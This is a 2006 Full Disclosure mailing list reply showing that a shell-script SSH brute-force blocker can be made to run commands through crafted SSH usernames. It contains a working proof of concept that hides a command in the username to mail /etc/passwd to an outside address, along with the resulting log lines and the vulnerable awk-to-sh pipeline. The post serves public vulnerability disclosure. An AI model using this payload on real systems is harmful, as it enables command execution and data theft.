Full Disclosure mailing list archives
Re: SSH brute force blocking tool
From: Tavis Ormandy <taviso () gentoo org>
Date: Tue, 28 Nov 2006 15:42:19 +0000
On Tue, Nov 28, 2006 at 09:33:03AM -0500, J. Oquendo wrote:
Thierry Zoller wrote:Dear All, You are arguing over hypothesises where facts could rule. PLEASE someone just setup the script on a test environment and present us your results. Heck, it's not that we are discussing Metaproblems here, these are computers. Just install and make a PoC and enhance security for all for the sake of it. Thanks :)
Out of interest, I did just that. It turns out to be quite tricky to get arbitrary shell commands in there as (at least on my system), ssh will stop logging usernames after certain characters are encountered, such as '/' or ':'. However, it is certainly possible. Here is an example. #!/bin/sh command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure () lists grok org uk)<${x}etc${x}passwd)' ssh -o "BatchMode yes" "a a $command"@$1 Which produces log entries like this: Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure () lists grok org uk)<${x}etc${x}passwd) Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure () lists grok org uk)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2 Note that the 13th field both contains a dot and is entirely controlled by me. This string is placed in /etc/hosts.deny by the script after executed by cron. The $1 in the awk script below is the entire string, which is piped unsanitised into /bin/sh: awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\ awk '/iptables/ && !/#/ && !/-s -i/'|sh The results are obvious.
The problem with the whole thread was "well someone could do XXX" Sure they could... Anyone could... My point was someone shooting a message back to the list stating "Your program is a backdoor".
Yes, I wrongly assumed you had malicious intentions, but are actually just an inexperienced programmer. I apologise for this.
It never was and it never will be. Can someone modify it on their own and make it a backdoor? Sure. Can someone inject something into the columns I was parsing, possible. Anything is possible. Since then I re-wrote arguments people were griping about:
Yes, although your code is still very fragile and relies on unique strings appearing in the logs. I certainly wouldnt want all that extra code running as root on untrusted input.
ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'` function IPT { grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' /etc/hosts.deny|\ awk '!/#/&&/\./&&!a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}'|\ awk '/iptables/&&!/#/&&!/-s -i/'|sh }
You also still havnt solved the problem of an attacker adding arbitrary addressed to hosts.deny.
The complaint was "anyone can insert $foo into the thirteenth column"... Try it instead of mouthing off about it. "Someone can possible inject tartar sauce into a sealed jar" Is it possible, sure it probably is, show me though instead of yapping off. Someone else griped, "someone can craftily insert your own address into an IP table." Look if someone is THAT stupid of an admin to not test things first, modify it to their needs, and gets themselves locked out of their own machine, they have no business on that machine. Period.
J, what would testing achieve? An attacker simply needs to know an important address to block. Your code is very naive and fragile, and should be avoided. Thanks, Tavis. -- ------------------------------------- taviso () sdf lonestar org | finger me for my pgp key. -------------------------------------------------------
Attachment:
_bin
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: SSH brute force blocking tool, (continued)
- Re: SSH brute force blocking tool Joshua D. Abraham (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Michael Holstein (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tonnerre Lombard (Nov 28)
- Re: SSH brute force blocking tool Brian Eaton (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 28)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 28)
- Re: SSH brute force blocking tool J. Oquendo (Nov 28)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 28)
- Re: SSH brute force blocking tool J. Oquendo (Nov 28)
- Re: SSH brute force blocking tool Thierry Zoller (Nov 28)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 28)
- Re: SSH brute force blocking tool Brian Eaton (Nov 28)
- Re: SSH brute force blocking tool Brian Eaton (Nov 28)